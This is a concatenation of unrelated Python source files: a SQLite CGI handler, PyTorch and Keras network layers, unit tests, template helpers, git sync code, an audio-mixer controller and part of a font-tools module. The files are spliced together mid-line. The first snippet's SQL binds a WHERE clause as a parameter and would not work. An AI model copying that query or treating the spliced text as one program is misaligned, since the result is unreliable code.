cur = db.cursor() if action == "count": cur.execute('SELECT count(*) cnt FROM RefSpectra;') print(cur.fetchone()[0]) elif action == "select": only_disabled = "onlyDisabled" in form and form.getvalue("onlyDisabled") == "true" limit = form.getvalue('limit') if type(limit) is not str: print(-3) exit() limits = limit.split(",") for l in limits: try: a = int(l) except: print(-4) exit() sql_query = "SELECT id, peptideModSeq, precursorCharge, scoreType FROM RefSpectra ? ORDER BY id LIMIT ?;" cur.execute(sql_query, ("WHERE scoreType = -1" if only_disabled else "", limit)) print(json.dumps([row for row in cur])) elif action == "update": e_id = form.getvalue('id').replace(",", "").replace("\"", "") value = form.getvalue('value').replace(",", "").replace("\"", "") try: a = int(e_id) a = int(value) except Exception as e: print(-5) exit() try: sql_query = "UPDATE RefSpectra SET scoreType = ? WHERE id = ?;" cur.execute(sql_query, (value, e_id)) db.commit() except Exception as e: print(-6) exit() print(0) import math import numpy as np import torch from torch import nn import torch.nn.functional as F from ..registry import NECKS from ..utils import ConvModule from mmcv.cnn import xavier_init class Identity(nn.Module): def __init__(self): super(Identity, self).__init__() def forward(self, x): return x def fill_up_weights(up): w = up.weight.data f = math.ceil(w.size(2) / 2) c = (2 * f - 1 - f % 2) / (2. * f) for i in range(w.size(2)): for j in range(w.size(3)): w[0, 0, i, j] = \ (1 - math.fabs(i / f - c)) * (1 - math.fabs(j / f - c)) for c in range(1, w.size(0)): w[c, 0, :, :] = w[0, 0, :, :] class IDAUp(nn.Module): def __init__(self, node_kernel, out_dim, channels, up_factors, conv_cfg=None, norm_cfg=None, activation='relu'): super(IDAUp, self).__init__() self.channels = channels self.out_dim = out_dim for i, c in enumerate(channels): if c == out_dim: proj = Identity() else: proj = ConvModule( c, out_dim, kernel_size=1, stride=1, conv_cfg=conv_cfg, norm_cfg=norm_cfg, activation=activation) f = int(up_factors[i]) if f == 1: up = Identity() else: up = nn.ConvTranspose2d( out_dim, out_dim, f * 2, stride=f, padding=f // 2, output_padding=0, groups=out_dim, bias=False) fill_up_weights(up) setattr(self, 'proj_' + str(i), proj) setattr(self, 'up_' + str(i), up) for i in range(1, len(channels)): node = ConvModule( out_dim * 2, out_dim, kernel_size=node_kernel, stride=1, padding=node_kernel // 2, conv_cfg=conv_cfg, norm_cfg=norm_cfg, activation=activation) setattr(self, 'node_' + str(i), node) for m in self.modules(): classname = m.__class__.__name__ if isinstance(m, nn.Conv2d): m.weight.data.normal_(0, 0.02) elif classname.find('BatchNorm') != -1: m.weight.data.fill_(1) m.bias.data.zero_() def forward(self, layers): assert len(self.channels) == len(layers), \ '{} vs {} layers'.format(len(self.channels), len(layers)) layers = list(layers) for i, l in enumerate(layers): upsample = getattr(self, 'up_' + str(i)) project = getattr(self, 'proj_' + str(i)) layers[i] = upsample(project(l)) x = layers[0] y = [] for i in range(1, len(layers)): node = getattr(self, 'node_' + str(i)) x = node(torch.cat([x, layers[i]], 1)) y.append(x) return x, y @NECKS.register_module class DLAUp(nn.Module): def __init__(self, channels, scales=(1, 2, 4, 8), in_channels=None, num_outs=4, conv_cfg=None, norm_cfg=None, activation='relu'): super(DLAUp, self).__init__() if in_channels is None: in_channels = channels self.channels = channels channels = list(channels) scales = np.array(scales, dtype=int) self.last_conv = ConvModule( in_channels[-1], channels[-1], 1, conv_cfg=conv_cfg, norm_cfg=norm_cfg, activation=activation) self.num_outs = num_outs for i in range(len(channels) - 1): j = -i - 2 setattr( self, 'ida_{}'.format(i), IDAUp(3, channels[j], in_channels[j:], scales[j:] // scales[j])) scales[j + 1:] = scales[j] in_channels[j + 1:] = [channels[j] for _ in channels[j + 1:]] # default init_weights for conv(msra) and norm in ConvModule def init_weights(self): for m in self.modules(): if isinstance(m, nn.Conv2d): xavier_init(m, distribution='uniform') def forward(self, layers): layers = list(layers) assert len(layers) > 1 ms_feat = [layers[-1]] for i in range(len(layers) - 1): ida = getattr(self, 'ida_{}'.format(i)) x, y = ida(layers[-i - 2:]) # y : aggregation nodes layers[-i - 1:] = y ms_feat.append(x) ms_feat = ms_feat[::-1] ms_feat[-1] = self.last_conv(ms_feat[-1]) if self.num_outs > len(ms_feat): ms_feat.append(F.max_pool2d(ms_feat[-1], 1, stride=2)) return ms_feat # x from helpers.b64 import base64_dict, base64_str from helpers.json import json_responenoralsydmp/icetea # pylint: disable=missing-docstring,redundant-unittest-assert """ Copyright 2017 ARM Limited Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. """ import unittest import mock import icetea_lib.tools.asserts as asserts from icetea_lib.TestStepError import TestStepFail class MockBench(object): def __init__(self): pass def command(self): pass def logger(self): pass class AssertTestcase(unittest.TestCase): def setUp(self): self.asserts = asserts def test_assert_booleans(self): with self.assertRaises(TestStepFail): self.asserts.assertTrue(False, "False was not True!") with self.assertRaises(TestStepFail): self.asserts.assertFalse(True) try: self.asserts.assertTrue(True, "True was somehow False?!") self.asserts.assertTrue([1, 2]) self.assertTrue(True, "No fail was raised.") except TestStepFail: self.assertTrue(False, "TestStepFail was raised! ") try: self.asserts.assertFalse(False) self.asserts.assertFalse([]) self.asserts.assertFalse({}) self.assertTrue(True, "No fail was raised.") except TestStepFail: self.assertTrue(False, "TestStepFail was raised! ") def test_assert_nones(self): with self.assertRaises(TestStepFail): self.asserts.assertNone(1) with self.assertRaises(TestStepFail): self.asserts.assertNotNone(None) try: self.asserts.assertNone(None) self.asserts.assertNotNone(1) except TestStepFail: self.assertTrue(False, "TestStepFail was raised!") def test_assert_equals(self): with self.assertRaises(TestStepFail): self.asserts.assertEqual(1, 2) with self.assertRaises(TestStepFail): self.asserts.assertNotEqual(1, 1) try: self.asserts.assertEqual(1, 1) self.asserts.assertNotEqual(1, 2) except TestStepFail: self.assertTrue(False, "TestStepFail was raised!") def test_assert_json_contains(self): with self.assertRaises(TestStepFail): self.asserts.assertJsonContains('{"test": "key"}', "test2") with self.assertRaises(TestStepFail): self.asserts.assertJsonContains("{'test': 'key'}", "test") with self.assertRaises(TestStepFail): self.asserts.assertJsonContains(None, "test") try: self.asserts.assertJsonContains('{"test": "key"}', 'test') except TestStepFail: self.assertTrue(False, 'Key test was not contained in {"test": "key"}?') def test_assert_dut_trace_contains(self): mock_bench = mock.MagicMock() mock_bench.verify_trace = mock.MagicMock(side_effect=[True, False]) self.asserts.assertDutTraceContains(1, "message_found", mock_bench) with self.assertRaises(TestStepFail): self.asserts.assertDutTraceContains(1, "message_not_found", mock_bench) def test_assert_dut_trace_does_not_contain(self): # pylint: disable=invalid-name mock_bench = mock.MagicMock() mock_bench.verify_trace = mock.MagicMock(side_effect=[True, False]) with self.assertRaises(TestStepFail): self.asserts.assertDutTraceDoesNotContain(1, "message_found", mock_bench) self.asserts.assertDutTraceDoesNotContain(1, "message_not_found", mock_bench) if __name__ == '__main__': unittest.main() import torch.nn as nn import torch.nn.functional as F import torch class BaseNet(nn.Module): """ Must be used and """ def __init__(self, ForwardLayers, **kwargs): """ param num_layers: An integer, number of layers param num_channels: An integer, number of layers :param ForwardLayers: The class object constructor, not an instance!!! Internally called to instantiate network Must extend from ForwardLayersBase :param Loss: Simply the Loss class constructor inside Loss.py, no other Loss mechanism is implemented yet. :param confidence_penalty: :param super_resolution_factor: :param kwargs: """ super(BaseNet, self).__init__() self.forward_net = ForwardLayers(**kwargs) # def forward(self, input, desired_output, root_weight, root_weight_map, **kwargs): def forward(self, input, **kwargs): net_output, before_sigmoid = self.forward_net(input, **kwargs) return net_output, before_sigmoid def calculate_shape_decreases_3D_Net(self, input_crop_size): """ Calculate the shape decrease between the output and input image This decrease is not dependent on input size, but only on network structure :param input_crop_size: should be a list of crop side lengths, with the order in x,y,z :return: """ cropsize_x, cropsize_y, cropsize_z = input_crop_size input_crop = torch.ones((1, cropsize_z, cropsize_x, cropsize_y)) net_output, _ = self.forward_net(input_crop) _, outsize_z, outsize_y, outsize_x = net_output.size() # #debugging # print("input shape:", input_crop.size()) # print("output shape:", net_output.size()) # outsize_z = int(outsize_z/self.super_resolution_factor) # outsize_y = int(outsize_y/self.super_resolution_factor) # outsize_x = int(outsize_x/self.super_resolution_factor) return cropsize_x-outsize_x, cropsize_y-outsize_y, cropsize_z-outsize_z class ForwardLayersBase(nn.Module): def __init__(self, **kwargs): """ Must be implemented in the subclass, you put whatever your network uses (convolutional layers etc.) into this class. :param num_layers: :param num_channels: :param super_resolution_factor: """ super(ForwardLayersBase, self).__init__() pass def forward(self, x, **kwargs): """ Must be implemented in the subclass :param x: the input to the network, volume mapped to RGB :param kwargs: if the network uses additional information, they can be provided inside kwargs :return: the network before and after sigmoid function """ pass import turtle turtle.pencolor("blue") turtle.pensize(3) #THICC turtle.fillcolor("yellow") turtle.begin_fill() turtle.setheading(360) for n in range (8): turtle.forward(50) turtle.right(45) turtle.end_fill() from tensorflow.keras import layers import tensorflow.keras.backend as K # Octave Convolution Layer class OctConv2D(layers.Layer): """ Define the OctConv2D which can replace the Conv2D layer. Paper: Drop an Octave: Reducing Spatial Redundancy in Convolutional Neural Networks with Octave Convolution. (2019) """ def __init__(self, filters, alpha, kernel_size=(3, 3), strides=(1, 1), padding="same", kernel_initializer='glorot_uniform', kernel_regularizer=None, kernel_constraint=None, **kwargs): """ :param filters: # output channels for low + high :param alpha: Low to high channels ratio (alpha=0 -> High channels only, alpha=1 -> Low channels only) :param kernel_size: 3x3 by default :param strides: 1x1 by default :param padding: "same" by default :param kernel_initializer: "glorot_uniform" by default :param kernel_regularizer: "None" by default, you can specify one :param kernel_constraint: "None" by default, you can specify one :param kwargs: other keyword arguments """ assert 0 <= alpha <= 1 assert filters > 0 and isinstance(filters, int) super().__init__(**kwargs) # required arguments self.alpha = alpha self.filters = filters # optional arguments self.kernel_size = kernel_size self.strides = strides self.padding = padding self.kernel_initializer = kernel_initializer self.kernel_regularizer = kernel_regularizer self.kernel_constraint = kernel_constraint # Low Channels self.low_channels = int(self.filters * self.alpha) # High Channels self.high_channels = self.filters - self.low_channels def build(self, input_shape): assert len(input_shape) == 2 assert len(input_shape[0]) == 4 and len(input_shape[1]) == 4 # assertion for high channel inputs assert input_shape[0][1] // 2 >= self.kernel_size[0] assert input_shape[0][2] // 2 >= self.kernel_size[1] # assertion for low channel inputs assert input_shape[0][1] // input_shape[1][1] == 2 assert input_shape[0][2] // input_shape[1][2] == 2 # "channels last" format for TensorFlow assert K.image_data_format() == "channels_last" # input channels high_in = int(input_shape[0][3]) low_in = int(input_shape[1][3]) # High Channels -> High Channels self.high_to_high_kernel = self.add_weight(name="high_to_high_kernel", shape=(*self.kernel_size, high_in, self.high_channels), initializer=self.kernel_initializer, regularizer=self.kernel_regularizer, constraint=self.kernel_constraint) # High Channels -> Low Channels self.high_to_low_kernel = self.add_weight(name="high_to_low_kernel", shape=(*self.kernel_size, high_in, self.low_channels), initializer=self.kernel_initializer, regularizer=self.kernel_regularizer, constraint=self.kernel_constraint) # Low Channels -> High Channels self.low_to_high_kernel = self.add_weight(name="low_to_high_kernel", shape=(*self.kernel_size, low_in, self.high_channels), initializer=self.kernel_initializer, regularizer=self.kernel_regularizer, constraint=self.kernel_constraint) # Low Channels -> Low Channels self.low_to_low_kernel = self.add_weight(name="low_to_low_kernel", shape=(*self.kernel_size, low_in, self.low_channels), initializer=self.kernel_initializer, regularizer=self.kernel_regularizer, constraint=self.kernel_constraint) super().build(input_shape) def call(self, inputs): # Input = [X^H, X^L] assert len(inputs) == 2 high_input, low_input = inputs # Convolution: High Channels -> High Channels high_to_high = K.conv2d(high_input, self.high_to_high_kernel, strides=self.strides, padding=self.padding, data_format="channels_last") # Convolution: High Channels -> Low Channels high_to_low = K.pool2d(high_input, (2, 2), strides=(2, 2), pool_mode="avg") high_to_low = K.conv2d(high_to_low, self.high_to_low_kernel, strides=self.strides, padding=self.padding, data_format="channels_last") # Convolution: Low Channels -> High Channels low_to_high = K.conv2d(low_input, self.low_to_high_kernel, strides=self.strides, padding=self.padding, data_format="channels_last") low_to_high = K.repeat_elements(low_to_high, 2, axis=1) # Nearest Neighbor Upsampling low_to_high = K.repeat_elements(low_to_high, 2, axis=2) # Convolution: Low Channels -> Low Channels low_to_low = K.conv2d(low_input, self.low_to_low_kernel, strides=self.strides, padding=self.padding, data_format="channels_last") # Cross Add high_add = high_to_high + low_to_high low_add = high_to_low + low_to_low return [high_add, low_add] def compute_output_shape(self, input_shapes): high_in_shape, low_in_shape = input_shapes high_out_shape = (*high_in_shape[:3], self.high_channels) low_out_shape = (*low_in_shape[:3], self.low_channels) return [high_out_shape, low_out_shape] def get_config(self): base_config = super().get_config() out_config = { **base_config, "filters": self.filters, "alpha": self.alpha, "kernel_size": self.kernel_size, "strides": self.strides, "padding": self.padding, "kernel_initializer": self.kernel_initializer, "kernel_regularizer": self.kernel_regularizer, "kernel_constraint": self.kernel_constraint, } return out_config import collections import itertools def data(settings) -> str: """ Impute name of field containing base64 encoded data. Parameters ---------- settings : typing.Dict YAML parsed to dict Returns ------- str: "name_of_data_field" """ return '"' + settings["input"]["name"] + '"' def fields(settings) -> str: """ Impute name of fields (if any) specifying tensor shape during request. Fields can be empty if tensor shape is known beforehand (STATIC macro defined, see `header.static` function). Parameters ---------- settings : typing.Dict YAML parsed to dict Returns ------- str: "field1", "field2", ..., "fieldN" """ return ", ".join( [ '"' + field + '"' for field in settings["input"]["shape"] if isinstance(field, str) ] ) def data_type(settings) -> str: type_mapping = { "base64": "", "byte": "uint8_t", "char": "int8_t", "short": "int16_t", "int": "int32_t", "long": "int64_t", "float": "float", "double": "double", } return type_mapping[settings["input"]["type"]] def data_func(settings) -> str: type_mapping = { "base64": "", "byte": "Integer", "char": "Integer", "short": "Integer", "int": "Integer", "long": "Int64", "float": "Double", "double": "Double", } return "As" + type_mapping[settings["input"]["type"]] def normalize(settings, key: str) -> str: """ Impute normalization values if any. Parameters ---------- settings : typing.Dict YAML parsed to dict key : str Name of YAML settings field (either means or stddevs) to be imputed Returns ------- str: "" or "value1, value2, value3" """ if settings["normalize"] is None: return "" return ", ".join(map(str, settings["normalize"][key])) def torch_data_type(settings): type_mapping = { "base64": "torch::kUInt8", "byte": "torch::kUInt8", "char": "torch::kInt8", "short": "torch::kInt16", "int": "torch::kInt32", "long": "torch::kInt64", "float": "torch::kFloat32", "double": "torch::kFloat64", } return type_mapping[settings["input"]["type"]] def inputs(settings) -> str: """ Impute input shapes. Shapes may be name of fields passed during request (dynamic input shape) or integers (static input shape) or mix of both. If field is a name (string), it will be transformed to `json_view.GetInteger(name)`. Parameters ---------- settings : typing.Dict YAML parsed to dict Returns ------- str: String like "1, 3, json_view.GetInteger("width"), json_view.GetInteger("height")" """ return ", ".join( str(elem) if isinstance(elem, int) else 'json_view.GetInteger("{}")'.format(elem) for elem in settings["input"]["shape"] ) def aws_to_torch(settings, key: str) -> str: """ Impute libtorch specific type from user provided "human-readable" form. See `type_mapping` in source code for exact mapping. Parameters ---------- settings : typing.Dict YAML parsed to dict Returns ------- str: String specifying type, e.g. "torch::kFloat16" """ type_mapping = { "bool": "torch::kInt8", "int": "torch::kInt32", "long": "torch::kInt64", "double": "torch::kFloat64", } if settings["return"][key] is None: return "" return type_mapping[settings["return"][key]["type"].lower()] def torch_approximation(settings, key: str) -> str: """ PyTorch has no `bool` type in libtorch hence we approximate one. Each item will be later static_casted to appropriate type if needed, which is essentially a no-op for for already correct types. Usually only `bool` will be casted (eventually other "hard-types" if the architecture is specific). Parameters ---------- settings : typing.Dict YAML parsed to dict Returns ------- str: String specifying type, e.g. "int8_t" """ type_mapping = { "bool": "int8_t", "int": "int32_t", "long": "int64_t", "double": "double", } if settings["return"][key] is None: return "" return type_mapping[settings["return"][key]["type"].lower()] def operations_and_arguments(settings): """ If return->result specified get names of operations to apply on output tensor. Merges return->result->operations and return->result->arguments into single string to input. return ->result->operations is required. Names of operations or arguments isn't verified and it may result in compilation error if user specifies unavailable tensor function. Current weak point in design, check if it can be improved and "safer". Parameters ---------- settings : typing.Dict YAML parsed to dict Returns ------- str: string representation of number, e.g. "255.0" """ def _add_namespace(operation): return "torch::{}".format(operation) def _operation_with_arguments(operation, *values): return "{}({})".format( _add_namespace(operation), ",".join(map(str, [value for value in values if value])), ) def _no_arguments_multiple_operations(operations): output = _operation_with_arguments(operations[0], "output") for operation in operations[1:]: output = _operation_with_arguments(operation, output) return output def _wrap_in_list(value): if not isinstance(value, list): return [value] return value if settings["return"]["result"] is None: return "" if "code" in settings["return"]["result"]: return settings["return"]["result"]["code"] operations = settings["return"]["result"]["operations"] arguments = settings["return"]["result"]["arguments"] if arguments is None: if isinstance(operations, str): return "{}(output)".format(_add_namespace(operations)) return _no_arguments_multiple_operations(operations) operations, arguments = _wrap_in_list(operations), _wrap_in_list(arguments) output = _operation_with_arguments(operations[0], "output", arguments[0]) for operation, argument in itertools.zip_longest(operations[1:], arguments[1:]): output = _operation_with_arguments(operation, output, argument) return output def aws_function(settings, key: str, array: bool) -> str: """ Internal imputation specifying one of AWS SDK functions based on type. This function specifies which AWS SDK function will be used to create JSONValue (either as single item to return or as part of array to return). Looked for in return->output and return->result settings and returns one or both depending on which is specified. Parameters ---------- settings : typing.Dict YAML parsed to dict key : str Name of field to look for in type (either "output" or "result") array: bool Whether prefix should be tailored to array output (`As`) or item (`With`) Returns ------- str: "" or "As" or "With" AWS function name """ prefix = "As" if array else "With" type_mapping = { "int": "Integer", "long": "Int64", "double": "Double", } if settings["return"][key] is None: return "" return prefix + type_mapping[settings["return"][key]["type"].lower()] def field_if_exists(settings, key: str, name: str) -> str: """ Return value of nested fields if those are specified. Parameters ---------- settings : typing.Dict YAML parsed to dict key : str Name of field to look for in type (either "output" or "result") name: str Name of field to look for in one of "output" or "result" Returns ------- str: "" or value provided in field """ if settings["return"][key] is None: return "" return settings["return"][key][name] def model(settings) -> str: """ Return path to model specified by settings. Parameters ---------- settings : typing.Dict YAML parsed to dict Returns ------- str: "/path/to/model" """ return '"' + settings["model"] + '"' import os from glob import glob from process_for_manuscript import all_kinder_plates, all_manuscript_plates def check_missing_outliers(): all_plates = all_kinder_plates() + all_manuscript_plates() outlier_pattern = '../../misc/tagged_outliers/*.csv' outlier_plates = glob(outlier_pattern) outlier_plates = [os.path.split(plate)[1] for plate in outlier_plates] outlier_plates = [plate[:plate.find('_tagger')] for plate in outlier_plates] missing_plates = list(set(all_plates) - set(outlier_plates)) missing_plates.sort() print("Missing tagged outliers") print("\n".join(missing_plates)) if __name__ == '__main__': check_missing_outliers() paulfanelli/planet_alignment """ .. module:: app :platform: linux :synopsis: The module containing the planet alignment application. .. moduleauthor:: <> .. modulecreated:: 6/27/15 """ from zope.interface import implements from planet_alignment.app.interface import IApp class App(object): """This class houses the main application and runs the planet alignment. - **parameters** and **types**:: :param system_data: The system data object containing planet alignment data. :param plugins_mgr: The plugins manager object containing a list of plugins. :param time: The amount of time to calculate the alignment for. :type system_data: SystemData object. :type plugins_mgr: PluginsManager object. :type time: float """ implements(IApp) def __init__(self, system_data, plugins_mgr, time): self._system_data = system_data self._plugins_mgr = plugins_mgr self._time = time def run(self): """Runs the planet alignment algorithm. :return: Returns a list of results, if there are any, else an empty list. :rtype: list """ result_retval = [] for plugin_path in self._plugins_mgr: try: plugin_inst = self._plugins_mgr.get_plugin_instance_by_path(plugin_path) plugin_name = self._plugins_mgr.get_plugin_name_by_path(plugin_path) except (KeyError, AttributeError) as e: print("WARNING: {}".format(e)) continue plugin_str = '' unique_aligned_list = [] first_entry = True for x in self._system_data: aligned_list = [] for y in self._system_data: # don't compare the planets to themselves if x.name == y.name: continue try: result = plugin_inst.are_planets_aligned(x, y, self._time) if result: if x.name not in aligned_list: aligned_list.append(x.name) aligned_list.append(y.name) aligned_list.sort() except AttributeError as ae: print("ERROR: {}: {}".format(plugin_path, ae)) except Exception as e: print("ERROR: Unknown error {}".format(e)) if aligned_list: if aligned_list not in unique_aligned_list: unique_aligned_list.append(aligned_list) for unique_aligned_entry in unique_aligned_list: if first_entry: first_entry = False else: plugin_str += '\n' plugin_str += plugin_name + ': ' + ', '.join(unique_aligned_entry) if plugin_str: result_retval.append(plugin_str) return result_retval def print_results(self, results): """Prints the results from the run of the planet alignment algorithm. :param results: List of the results output data. :type results: list :return: Returns the self reference. :rtype: App class. """ for line in results: print(line) return self import emlib """ Example 4. Lotka Volterra Validation ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ """ def LV3_int(t,initial,dtinput,constants): x = initial[0] y = initial[1] A = constants.Val("A") B = constants.Val("B") C = constants.Val("C") D = constants.Val("D") x_dot = (A * x) - (B * x *y) y_dot = (D * x * y) - (C * y) return [x_dot, y_dot] hares = emlib.Observation("Hares",filename="LVdata.csv") LVmodel = emlib.Model(LV3_int) LVBEST = emlib.Calibration() LVBEST.Add("A",val=.5) LVBEST.Add("B",val=.02) LVBEST.Add("C",val=.9) LVBEST.Add("D",val=.03) LVBEST.initial = [30.0,4.0] LVtime = emlib.TimeSeries(filename="LVinput.csv") LVmodel.Integrate(LVBEST.initial,Calibration=LVBEST,TimeSeries=LVtime,dt=(1.0/12.0)) LVmodel.Validate(hares,graph=True) 0 """Tools for document storgage.""" import os import shutil from xonsh.lib import subprocess from contextlib import contextmanager try: import hglib except: hglib = None def find_store(rc): if getattr(rc, "storename", None) is None and len(rc.stores) != 0: return rc.stores[0] for store in rc.stores: if store["name"] == rc.storename: return store else: msg = "Could not find the store {0!r}".format(rc.storename) raise RuntimeError(msg) def storage_path(store, rc): """Computes the storage directory.""" name, url = store["name"], store["url"] for db in rc.databases: if db["name"] == name and db["url"] == url: path = os.path.join(rc.builddir, "_dbs", name, store["path"]) break else: path = os.path.join(rc.builddir, "_stores", name, store["path"]) os.makedirs(path, exist_ok=True) return path def sync_git(store, path): """Syncs the local documents via git.""" storedir, _ = os.path.split(path) # get or update the storage if os.path.isdir(storedir): cmd = ["git", "pull"] cwd = storedir else: cmd = ["git", "clone", store["url"], storedir] cwd = None subprocess.check_call(cmd, cwd=cwd) def sync_hg(store, path): """Syncs the local documents via hg.""" storedir, _ = os.path.split(path) # get or update the storage if os.path.isdir(os.path.join(storedir, ".hg")): client = hglib.open(storedir) client.pull(update=True, force=True) else: # Strip off three characters for hg+ client = hglib.clone(store["url"][3:], storedir) def sync(store, path): """Syncs the local documents.""" url = store["url"] if url.startswith("git") or url.endswith(".git"): sync_git(store, path) elif url.startswith("hg+"): sync_hg(store, path) elif not os.path.exists(os.path.expanduser(url)): raise ValueError("Do not know how to sync this kind of storage.") def copydocs(store, path, rc): """Copies files to the staging area.""" for doc in rc.documents: dst = os.path.join(path, os.path.split(doc)[1]) if not rc.force and os.path.isfile(dst): raise RuntimeError(dst + " already exists!") shutil.copy2(doc, dst) def push_git(store, path): """Pushes the local documents via git.""" storedir, _ = os.path.split(path) cmd = ["git", "add", "."] subprocess.check_call(cmd, cwd=storedir) cmd = ["git", "commit", "-m", "regolith auto-store commit"] try: subprocess.check_call(cmd, cwd=storedir) except subprocess.CalledProcessError: warn("Could not git commit to " + storedir, RuntimeWarning) return cmd = ["git", "push"] try: subprocess.check_call(cmd, cwd=storedir) except subprocess.CalledProcessError: warn("Could not git push from " + storedir, RuntimeWarning) return def push_hg(store, path): """Pushes the local documents via git.""" storedir, _ = os.path.split(path) client = hglib.open(storedir) if len(client.status(modified=True, unknown=True, added=True)) == 0: return client.commit(message="regolith auto-commit", addremove=True) client.push() def push(store, path): """Pushes the local documents.""" url = store["url"] if url.startswith("git") or url.endswith(".git"): push_git(store, path) elif url.startswith("hg+"): push_hg(store, path) elif not os.path.exists(os.path.expanduser(url)): raise ValueError("Do not know how to push to this kind of storage.") class StorageClient(object): """Interface to the storage system""" def __init__(self, rc, store, path): self.rc = rc self.store = store self.path = path def copydoc(self, doc): """Copies file to the staging area.""" dst = os.path.join(self.path, os.path.split(doc)[1]) if not self.rc.force and os.path.isfile(dst): raise RuntimeError(dst + " already exists!") shutil.copy2(doc, dst) return dst def retrieve(self, file_name): """Get file from the store Parameters ---------- file_name : name of the file Returns ------- path : str or None The path, if the file is not in the store None """ ret = os.path.join(self.path, file_name) if os.path.exists(ret): return os.path.join(self.path, file_name) else: return None @contextmanager def store_client(rc): """Context manager for file storage Parameters ---------- rc : RunControl Yields ------- client : StorageClient The StorageClient instance """ store = find_store(rc) path = storage_path(store, rc) sync(store, path) yield StorageClient(rc, store, path) push(store, path) def main(rc): """Copies files into the local storage location and uploads them.""" with store_client(rc) as sclient: for doc in rc.documents: sclient.copydoc(doc) server/audiofire.py import dbus import time import subprocess bus = dbus.SessionBus() dest = 'org.ffado.Control' mixer_object = '/org/ffado/Control/DeviceManager/001486089d5fa7e6/Mixer' discrete_interface='org.ffado.Control.Element.Discrete' continuous_interface='org.ffado.Control.Element.Continuous' mixer_interface='org.ffado.Control.Element.MatrixMixer' try: dbus.Interface(bus.get_object(dest, "%s/MonitorMute" % mixer_object), dbus_interface=mixer_interface) except dbus.DBusException, ex: subprocess.Popen(['ffado-dbus-server', '-v3']).pid time.sleep(2) monitor_mute = dbus.Interface( bus.get_object(dest, "%s/MonitorMute" % mixer_object), dbus_interface=mixer_interface) monitor_pan = dbus.Interface( bus.get_object(dest, "%s/MonitorPan" % mixer_object), dbus_interface=mixer_interface) outputs = []; for o in range(12): output = {} output['mute'] = dbus.Interface( bus.get_object(dest, "%s/OUT%dMute" % (mixer_object, o)), dbus_interface=discrete_interface) output['gain'] = dbus.Interface( bus.get_object(dest, "%s/OUT%dGain" % (mixer_object, o)), dbus_interface=continuous_interface) outputs.append(output) def set_mute(ins, outs, mute): if len(outs) == 2: if len(ins) == 1: ins.append(ins[0]) for x in range(2): monitor_mute.setValue(ins[x], outs[x], int(mute)) elif len(outs) == 1: pan = monitor_pan.getValue(ins[0], outs[0]) is_left = outs[0] % 2 == 0 if mute == is_left: # (mute and left) or not (mute or left) pan += 127 else: pan -= 127 if pan == 254: pan += 1; elif pan == 128: pan -= 1; for x in range(len(ins)): monitor_pan.setValue(ins[x], outs[0], pan) if mute == bool(pan == 127): for x in range(len(ins)): monitor_mute.setValue(ins[x], outs[0], mute) def connect(ins, outs): if connected(ins, outs): return set_mute(ins, outs, False) def disconnect(ins, outs): if not connected(ins, outs): return set_mute(ins, outs, True) def connected(ins, outs): assert 0 < len(ins) <= 2 assert 0 < len(outs) <= 2 if bool(monitor_mute.getValue(ins[0], outs[0])): # it's muted return False if len(outs) == 2: return True return monitor_pan.getValue(ins[0], outs[0]) != (1 - (outs[0] % 2)) * 255 # Copyright 2017 Adobe. All rights reserved. import ast import hashlib import os import re from collections import OrderedDict from fontPens.thresholdPen import ThresholdPen from fontTools.misc import etree as ET from fontTools.misc import plistlib from fontTools.pens.recordingPen import RecordingPen from fontTools.ufoLib import UFOReader from psautohint.ufoFont import norm_float from afdko import fdkutils __version__ = '1.35.2' __doc__ = """ ufotools.py v1.35.2 Jul 30 2020 Originally developed to work with 'bez' files and UFO fonts in support of the autohint tool, ufotools.py is now only used in checkoutlinesufo (since autohint has been dropped in favor of psautohint). Some references to "bez" and "autohint" remain in the tool its documentation. Users should *NOT* rely on long-term support of methods or classes within this module directly. It is intended for AFDKO-internal use and not as a general-purpose library outside of AFDKO. The basic model is: - read GLIF file - transform GLIF XML element to bez file - call FDK tool on bez file - transform new bez file to GLIF XML element with new data, and save in list After all glyphs are done save all the new GLIF XML elements to GLIF files, and update the hash map. A complication in the Adobe UFO workflow comes from the fact we want to make sure that checkoutlines and autohint have been run on each glyph in a UFO font, when building an OTF font from the UFO font. We need to run checkoutlines, because we no longer remove overlaps from source UFO font data, because this can make revising a glyph much easier. We need to run autohint, because the glyphs must be hinted after checkoutlines is run, and in any case we want all glyphs to have been autohinted. The problem with this is that it can take a minute or two to run autohint or checkoutlines on a 2K-glyph font. The way we avoid this is to make and keep a hash of the source glyph drawing operators for each tool. When the tool is run, it calculates a hash of the source glyph, and compares it to the saved hash. If these are the same, the tool can skip the glyph. This saves a lot of time: if checkoutlines and autohint are run on all glyphs in a font, then a second pass is under 2 seconds. Another issue is that since we no longer remove overlaps from the source glyph files, checkoutlines must write any edited glyph data to a different layer in order to not destroy the source data. The ufotools defines an Adobe-specific glyph layer for processed glyphs, named "glyphs.com.adobe.type.processedGlyphs". checkoutlines writes new glyph files to the processed glyphs layer only when it makes a change to the glyph data. When the autohint program is run, the ufotools must be able to tell whether checkoutlines has been run and has altered a glyph: if so, the input file needs to be from the processed glyph layer, else it needs to be from the default glyph layer. The way the hashmap works is that we keep an entry for every glyph that has been processed, identified by a hash of its marking path data. Each entry contains: - a hash of the glyph point coordinates, from the default layer. This is set after a program has been run. - a history list: a list of the names of each program that has been run, in order. - an editStatus flag. Altered GLIF data is always written to the Adobe processed glyph layer. The program may or may not have altered the outline data. For example, autohint adds private hint data, and adds names to points, but does not change any paths. If the stored hash for the glyph does not exist, the ufotools lib will save the new hash in the hash map entry and will set the history list to contain just the current program. The program will read the glyph from the default layer. If the stored hash matches the hash for the current glyph file in the default layer, and the current program name is in the history list,then ufotools will return "skip=1", and the calling program may skip the glyph. If the stored hash matches the hash for the current glyph file in the default layer, and the current program name is not in the history list, then the ufotools will return "skip=0". If the font object field 'usedProcessedLayer' is set True, the program will read the glyph from the from the Adobe processed layer, if it exists, else it will always read from the default layer. If the hash differs between the hash map entry and the current glyph in the default layer, and usedProcessedLayer is False, then ufotools will return "skip=0". If usedProcessedLayer is True, then the program will consult the list of required programs. If any of these are in the history list, then the program will report an error and return skip =1, else it will return skip=1. The program will then save the new hash in the hash map entry and reset the history list to contain just the 